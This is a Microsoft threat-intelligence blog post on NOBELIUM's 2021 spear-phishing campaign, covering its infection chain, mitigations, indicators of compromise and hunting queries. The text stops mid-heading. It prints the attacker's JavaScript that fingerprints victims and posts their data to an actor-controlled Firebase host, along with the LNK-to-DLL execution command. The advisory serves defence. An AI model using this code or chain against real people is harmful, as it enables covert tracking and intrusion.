{"id":93630,"date":"2021-05-27T17:00:50","date_gmt":"2021-05-28T00:00:50","guid":{"rendered":""},"modified":"2025-07-03T04:59:18","modified_gmt":"2025-07-03T11:59:18","slug":"new-sophisticated-email-based-attack-from-nobelium","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/","title":{"rendered":"New sophisticated email-based attack from NOBELIUM"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2020\/12\/18\/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect\/\" target=\"_blank\" rel=\"noreferrer noopener\">SUNBURST backdoor<\/a>,&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/01\/20\/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop\/\" target=\"_blank\" rel=\"noreferrer noopener\">TEARDROP malware<\/a>,&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/03\/04\/goldmax-goldfinder-sibot-analyzing-nobelium-malware\/\" target=\"_blank\" rel=\"noreferrer noopener\">GoldMax malware<\/a>, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service,&nbsp;<a href=\"https:\/\/www.constantcontact.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Constant Contact<\/a>, to masquerade as a US-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft is issuing this alert and new security research regarding this sophisticated&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/03\/04\/goldmax-goldfinder-sibot-analyzing-nobelium-malware\/\" target=\"_blank\" rel=\"noreferrer noopener\">email-based campaign that NOBELIUM has been operating<\/a>&nbsp;to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the&nbsp;<a href=\"https:\/\/blogs.microsoft.com\/on-the-issues\/?p=64692\" target=\"_blank\" rel=\"noreferrer noopener\">Microsoft On The Issues blog<\/a>.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow has-quote-default-font-size\">\n<p class=\"wp-block-paragraph\">Note: This is an active incident. We will post more details here as they become available.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em><strong>Update [05\/28\/2021]<\/strong>: We published a new blog post detailing&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/28\/breaking-down-nobeliums-latest-early-stage-toolset\/\">NOBELIUM\u2019s latest early-stage toolset<\/a>, composed of four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage.&nbsp;<\/em><\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">NOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an&nbsp;<a href=\"https:\/\/msrc-blog.microsoft.com\/2020\/12\/21\/december-21st-2020-solorigate-resource-center\/\" target=\"_blank\" rel=\"noreferrer noopener\">established pattern<\/a>&nbsp;of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service\u2019s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/en-us\/microsoft-365\/security\/microsoft-365-defender\">Microsoft 365 Defender<\/a>&nbsp;delivers coordinated defense against this threat.&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/microsoft-365\/security\/office-365-defender\">Microsoft Defender for Office 365<\/a>&nbsp;detects the malicious emails, and&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/microsoft-365\/security\/endpoint-defender\">Microsoft Defender for Endpoint<\/a>&nbsp;detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and&nbsp;take the actions described below in this article.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We continue to see an increase in sophisticated and&nbsp;<a href=\"https:\/\/blogs.microsoft.com\/on-the-issues\/2021\/03\/02\/new-nation-state-cyberattacks\/\" target=\"_blank\" rel=\"noreferrer noopener\">nation-state-sponsored attacks<\/a>&nbsp;and, as part of our ongoing threat research and efforts to protect customers, we will continue to&nbsp;<a href=\"https:\/\/blogs.microsoft.com\/on-the-issues\/2020\/12\/13\/customers-protect-nation-state-cyberattacks\/\" target=\"_blank\" rel=\"noreferrer noopener\">provide guidance<\/a>&nbsp;to the security community on how to secure against and respond to these multi-dimensional attacks.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"spear-phishing-campaign-delivers-nobelium-payloads\">Spear-phishing campaign delivers NOBELIUM payloads<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that these observations represent changes in the actor\u2019s tradecraft and possible experimentation following widespread disclosures of previous&nbsp;incidents.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"early-testing-and-initial-discovery\">Early testing and initial discovery<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">As part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"evolving-delivery-techniques\">Evolving delivery techniques<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">In the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"520\" height=\"386\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2021\/05\/HMTL-ISO.png\" alt=\"Example Flow of HMTL\/ISO infection chain.\" class=\"wp-image-93631\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/HMTL-ISO.png 520w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/HMTL-ISO-300x223.png 300w\" sizes=\"auto, (max-width: 520px) 100vw, 520px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 1. Example Flow of HMTL\/ISO infection chain.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Here\u2019s an example of target fingerprinting code leveraging Firebase:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; gutter: false; title: ; notranslate\" title=\"\">\ntry {\nlet sdfgfghj = '';\nlet kjhyui = new XMLHttpRequest();\nkjhyui.open('GET', 'https:\/\/api.ipify.org\/?format=jsonp?callback=?', false);\nkjhyui.onreadystatechange = function (){\nsdfgfghj = this.responseText;\n}\nkjhyui.send(null);\nlet ioiolertsfsd = navigator.userAgent;\nlet uyio = window.location.pathname.replace('\/','');\nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};\nctryur = JSON.stringify(ctryur);\nlet sdfghfgh = new XMLHttpRequest();\nsdfghfgh.open('POST', 'https:\/\/eventbrite-com-default-rtdb.firebaseio.com\/root.json', false);\nsdfghfgh.setRequestHeader('Content-Type', 'application\/json');\nsdfghfgh.send(ctryur);\n} catch (e) {}\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">Similar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"escalated-targeting-and-delivery\">Escalated targeting and delivery<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Experimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the&nbsp;<em>api.ipify.org<\/em>&nbsp;service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL\/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID&nbsp;<em>&lt;ashainfo@usaid.gov&gt;,<\/em>&nbsp;while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in&nbsp;<em>@in.constantcontact.com<\/em>, and (which varies for each recipient), and a Reply-To address of &lt;<em>mhillary@usaid.gov&gt;<\/em>&nbsp;was observed. The emails pose as an alert from USAID, as seen below.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1074\" height=\"1395\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2021\/05\/Example-email.png\" alt=\"Example email screenshot.\" class=\"wp-image-93638\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/Example-email.png 1074w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/Example-email-231x300.png 231w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/Example-email-788x1024.png 788w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/Example-email-768x998.png 768w\" sizes=\"auto, (max-width: 1074px) 100vw, 1074px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 2. Example email screenshot.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">If the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/r20.rs6[.]net\/tn.jsp?f=\">https:\/\/r20.rs6[.]net\/tn.jsp?f=<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/usaid.theyardservice[.]com\/d\/<target_email_address>&#8220;>https:\/\/usaid.theyardservice[.]com\/d\/&lt;target_email_address&gt;<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in the&nbsp;<em>%USER%<\/em><em>AppDataLocalTemp&lt;random folder name&gt;<\/em>&nbsp;path:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">A shortcut, such as&nbsp;<em>Reports.lnk<\/em>, that executes a custom Cobalt Strike Beacon loader<\/li>\n\n\n\n<li class=\"wp-block-list-item\">A decoy document, such as&nbsp;<em>ica-declass.pdf<\/em>, that is displayed to the target<\/li>\n\n\n\n<li class=\"wp-block-list-item\">A DLL, such as&nbsp;<em>Document.dll<\/em>, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1009\" height=\"484\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2021\/05\/ISO-file-contents.png\" alt=\"ISO file contents with hidden &quot;Documents.dll&quot; inside.\" class=\"wp-image-93634\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/ISO-file-contents.png 1009w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/ISO-file-contents-300x144.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/ISO-file-contents-768x368.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 3. ISO file contents. It is worth noting that the \u201cDocuments.dll\u201d is a hidden file.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"425\" height=\"628\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2021\/05\/Shortcut-DLL.png\" alt=\"Shortcut which executes the hidden DLL file.\" class=\"wp-image-93635\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/Shortcut-DLL.png 425w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/Shortcut-DLL-203x300.png 203w\" sizes=\"auto, (max-width: 425px) 100vw, 425px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 4. Shortcut which executes the hidden DLL file.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The end result when detonating the LNK file is the execution of \u201cC:Windowssystem32rundll32.exe Documents.dll,Open\u201d.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems. Then, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Indicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams to identify actor activity.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft security researchers assess that the NOBELIUM\u2019s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft continues to monitor this threat actor\u2019s evolving activities and will update as necessary.&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/microsoft-365\/security\/microsoft-365-defender\">Microsoft 365 Defender<\/a>&nbsp;protects customers against the multiple components of this threat: malicious emails, file attachments, connections, malware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection names and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"mitigations\">Mitigations<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Turn on&nbsp;<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">cloud-delivered protection<\/a>&nbsp;in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Run&nbsp;<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/edr-in-block-mode?view=o365-worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">EDR in block mode&nbsp;<\/a>so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Enable&nbsp;<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/enable-network-protection?view=o365-worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">network protection<\/a>&nbsp;to prevent applications or users from accessing malicious domains and other malicious content on the internet.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Enable<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/automated-investigations?view=o365-worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">&nbsp;investigation and remediation<\/a>&nbsp;in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Use&nbsp;<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/device-discovery?view=o365-worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">device discovery&nbsp;<\/a>to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Enable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/account\/authenticator\/\" target=\"_blank\" rel=\"noreferrer noopener\">secure your accounts<\/a>.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">For Office 365 users, see&nbsp;<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/admin\/security-and-compliance\/set-up-multi-factor-authentication?view=o365-worldwide&amp;viewFallbackFrom=o365worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">multifactor authentication support<\/a>.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">For Consumer and Personal email accounts, see how to use&nbsp;<a href=\"https:\/\/support.microsoft.com\/en-us\/account-billing\/how-to-use-two-step-verification-with-your-microsoft-account-c7910146-672f-01e9-50a0-93b4585e7eb4\" target=\"_blank\" rel=\"noreferrer noopener\">two-step verification<\/a>.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Turn on the following&nbsp;<a href=\"https:\/\/docs.microsoft.com\/windows\/security\/threat-protection\/microsoft-defender-atp\/attack-surface-reduction\" target=\"_blank\" rel=\"noreferrer noopener\">attack surface reduction rule<\/a>&nbsp;to block or audit activity associated with this threat:&nbsp;<em>Block all Office applications from creating child processes<\/em>. NOTE:&nbsp;<a href=\"https:\/\/docs.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/evaluate-attack-surface-reduction?view=o365-worldwide\" target=\"_blank\" rel=\"noreferrer noopener\">Assess rule impact<\/a>&nbsp;before deployment.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"indicators-of-compromise-ioc\">Indicators of compromise (IOC)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This attack is still active, so these indicators should not be considered exhaustive for this observed activity.&nbsp;These indicators of compromise are from the large-scale campaign launched on May 25, 2021.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>INDICATOR<\/td><td>TYPE<\/td><td>DESCRIPTION<\/td><\/tr><tr><td>ashainfo@usaid.gov<\/td><td>Email<\/td><td>Spoofed email account<\/td><\/tr><tr><td>mhillary@usaid.gov<\/td><td>Email<\/td><td>Spoofed email account<\/td><\/tr><tr><td>2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252<\/td><td>SHA-256<\/td><td>Malicious ISO file (container)<\/td><\/tr><tr><td>d035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142<\/td><td>SHA-256<\/td><td>Malicious ISO file (container)<\/td><\/tr><tr><td>94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916<\/td><td>SHA-256<\/td><td>Malicious ISO file (container)<\/td><\/tr><tr><td>48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0<\/td><td>SHA-256<\/td><td>Malicious shortcut (LNK)<\/td><\/tr><tr><td>ee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c<\/td><td>SHA-256<\/td><td>Cobalt Strike Beacon malware<\/td><\/tr><tr><td>ee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330<\/td><td>SHA-256<\/td><td>Cobalt Strike Beacon malware<\/td><\/tr><tr><td>usaid.theyardservice[.]com<\/td><td>Domain<\/td><td>Subdomain used to distribute ISO file<\/td><\/tr><tr><td>worldhomeoutlet[.]com<\/td><td>Domain<\/td><td>Subdomain in Cobalt Strike C2<\/td><\/tr><tr><td>dataplane.theyardservice[.]com<\/td><td>Domain<\/td><td>Subdomain in Cobalt Strike C2<\/td><\/tr><tr><td>cdn.theyardservice[.]com<\/td><td>Domain<\/td><td>Subdomain in Cobalt Strike C2<\/td><\/tr><tr><td>static.theyardservice[.]com<\/td><td>Domain<\/td><td>Subdomain in Cobalt Strike C2<\/td><\/tr><tr><td>192[.]99[.]221[.]77<\/td><td>IP address<\/td><td>IP resolved to by&nbsp;<em>worldhomeoutlet[.]com<\/em><\/td><\/tr><tr><td>83[.]171[.]237[.]173<\/td><td>IP address<\/td><td>IP resolved to by *<em>theyardservice[.]com<\/em><\/td><\/tr><tr><td>theyardservice[.]com<\/td><td>Domain<\/td><td>Actor controlled domain<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"detection-details\">Detection details<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"antivirus\">Antivirus<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft Defender Antivirus detects threat components as the following malware:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/www.microsoft.com\/en-us\/wdsi\/threats\/malware-encyclopedia-description?Name=Trojan:Win32\/NativeZone.C!dha&amp;threatId=-2147185566\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan:Win32\/NativeZone.C!dha<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"endpoint-detection-and-response-edr\">Endpoint detection and response (EDR)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Alerts with the following titles in the Security Center can indicate threat activity on your network:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Malicious ISO File used by NOBELIUM<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Cobalt Strike Beacon used by NOBELIUM<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Cobalt Strike network infrastructure used by NOBELIUM<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">An uncommon file was created and added to startup folder.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">A link file (LNK) with unusual characteristics was opened.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"advanced-hunting\">Advanced hunting<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"microsoft-365-defender\">Microsoft 365 Defender<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>NOTE:<\/strong>&nbsp;The following sample queries lets you search for a week\u2019s worth of events. To explore up to 30 days\u2019 worth of raw data to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week, go to the&nbsp;<strong>Advanced Hunting<\/strong>&nbsp;page &gt;&nbsp;<strong>Query<\/strong>&nbsp;tab, select the calendar drop-down menu to update your query to hunt for the&nbsp;<strong>Last 30 days<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To locate possible exploitation activity, run the following query in the Microsoft 365 security center:<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"nobelium-abuse-of-usaid-constant-contact-resources-in-email-data\">NOBELIUM abuse of USAID Constant Contact resources in email data<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Looks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report.&nbsp;<a href=\"https:\/\/security.microsoft.com\/hunting?query=H4sIAAAAAAAEAI2QzQqCUBCFzzroHURaS7Ro5y6DFraJHkDUzH6uoJabHr7PMWojIQN3fs-ZMzfSXYlK3XRUzbuT00mVPM010wvf6aycXk48zGzoDyhHLcQ8-XRWWirAN1rjHYiW-o_pAm7AXM1nIHvvjN9T9NUS6UnNgW-oV4ZZUM_R1sK9N-6OTg1XTNZgiQqinfGGzNdwFaifghi_92AqMsvjj7YtcX__-C_0WaDUNDdsTOyKIe-z1NSkhvUnbP2_7WE3lMwGXFLxa77e-0liDdIBAAA&amp;runQuery=true&amp;timeRangeId=week\" target=\"_blank\" rel=\"noreferrer noopener\">Run query in Microsoft 365 security center.<\/a><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; gutter: false; title: ; notranslate\" title=\"\">\nEmailUrlInfo\n| where UrlDomain == \"r20.rs6.net\"\n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId\n| where SenderMailFromDomain == \"in.constantcontact.com\"\n| where SenderFromDomain == \"usaid.gov\"\n<\/pre><\/div>\n\n\n<h5 class=\"wp-block-heading\" id=\"nobelium-subject-lines-used-in-abuse-of-constant-contact-service\">NOBELIUM&nbsp;subject lines used in abuse of&nbsp;Constant Contact service<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Looks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. It also specifies email subject keywords seen in&nbsp;phishing campaigns in late May using the term \u201cSpecial Alert!\u201d in various ways in the subject.&nbsp;<a href=\"https:\/\/security.microsoft.com\/hunting?query=H4sIAAAAAAAEAI2SS2vCQBSFz1rofwihiwoSpItuiguhCi7sRruWaX1UjRNJYkXoj-83d6RkYUoJw32eM-feTK6VaiWa6aR37Yg-iOfYUgdVVAacoxz5vRbYks_pQvZBKbijYbbkcuIeZ4gX8DV-V8-6U0cj2Bxdud6o5JrIa63Cat9wnfVpmBV-7HihGjHeVAQdKZVH9ZVhKz1hvelPf3l2oCJib3YJLlhv7ElDx0hf5DzoMGVhmHtTviaX6dWYz1RKuKZEFZ_TBm9ivAP6S7g2aP8P4tasM9OwtHh6VTbGD7Pf3kCIMjYeFFfc52yGGNf2n-pr_dDYS9udf991Mv1bejOmKNhYG2Pz9SRUHMiFaYsvpe19dfUDjw6wVYICAAA&amp;runQuery=true&amp;timeRangeId=week\" target=\"_blank\" rel=\"noreferrer noopener\">Run query in Microsoft 365 security center.<\/a><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; gutter: false; title: ; notranslate\" title=\"\">\nlet\u202fSubjectTerms\u202f=\u202fpack_array\u202f(\"Special\",\"Alert\");\n\nEmailUrlInfo\n|\u202fwhere\u202fUrlDomain\u202f==\u202f\"r20.rs6.net\"\n|\u202fjoin\u202fkind=inner\u202fEmailEvents\u202fon\u202f$left.NetworkMessageId==$right.NetworkMessageId\n|\u202fwhere\u202fSenderMailFromDomain\u202f==\u202f\"in.constantcontact.com\"\n|\u202fwhere\u202fSenderFromDomain\u202f==\u202f\"usaid.gov\"\n|\u202fwhere\u202fSubject\u202fhas_any\u202f(SubjectTerms)\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\" id=\"azure-sentinel\">Azure 